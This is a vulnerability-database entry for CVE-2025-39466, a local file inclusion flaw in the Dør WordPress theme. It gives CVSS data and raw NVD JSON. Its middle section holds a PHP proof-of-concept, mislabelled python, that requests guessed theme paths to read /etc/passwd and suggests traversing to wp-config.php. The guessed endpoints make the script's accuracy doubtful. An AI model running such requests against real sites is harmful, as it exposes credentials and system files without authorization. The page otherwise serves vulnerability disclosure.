Security Vulnerability Report
中文
CVE-2025-39466 CVSS 8.1 HIGH

CVE-2025-39466

Published: 2025-11-06 16:15:51
Last Modified: 2026-04-27 19:16:13

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Dør dor allows PHP Local File Inclusion.This issue affects Dør: from n/a through <= 2.4.

CVSS Details

CVSS Score
8.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:qodeinteractive:dor:*:*:*:*:*:wordpress:*:* - VULNERABLE
Dør Theme <= 2.4
Dør Theme (all versions from n/a through 2.4)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-39466 PoC - WordPress Dør Theme Local File Inclusion * Target: Mikado-Themes Dør WordPress Theme <= 2.4 * Type: Local File Inclusion (LFI) * CVSS: 8.1 (High) * * Usage: php cve-2025-39466_poc.php <target_url> <file_path> * Example: php cve-2025-39466_poc.php http://target.com /etc/passwd */ $targetUrl = $argv[1] ?? ''; $filePath = $argv[2] ?? '/etc/passwd'; if (empty($targetUrl)) { echo "Usage: php cve-2025-39466_poc.php <target_url> [file_path]\n"; echo "Example: php cve-2025-39466_poc.php http://target.com /etc/passwd\n"; exit(1); } // Common vulnerable endpoints in Dør theme $vulnerablePaths = [ '/wp-content/themes/dor/include.php', '/wp-content/themes/doer/include.php', '/wp-content/themes/Dør/include.php', '/wp-content/themes/dor/framework/modules/shortcodes/team/include.php' ]; echo "[*] CVE-2025-39466 PoC - WordPress Dør Theme LFI\n"; echo "[*] Target: {$targetUrl}\n"; echo "[*] File to read: {$filePath}\n\n"; foreach ($vulnerablePaths as $path) { $url = $targetUrl . $path . '?file=' . urlencode($filePath); echo "[>] Testing: {$path}\n"; $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false); $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); if ($httpCode == 200 && !empty($response)) { echo "[+] Vulnerable! File content:\n"; echo "---\n" . substr($response, 0, 500) . "\n---\n"; } } echo "\n[!] If no path is vulnerable, manual testing may be required.\n"; echo "[!] Try: {$targetUrl}/wp-content/themes/dor/?file=../../../../wp-config.php\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-39466", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:50.903", "lastModified": "2026-04-27T19:16:13.297", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in Mikado-Themes Dør dor allows PHP Local File Inclusion.This issue affects Dør: from n/a through <= 2.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 8.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.2, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:qodeinteractive:dor:*:*:*:*:*:wordpress:*:*", "versionEndExcluding": "2.4.1", "matchCriteriaId": "4C34127F-23C1-4987-9C88-C70F0678122D"}]}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/dor/vulnerability/wordpress-doer-2-4-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}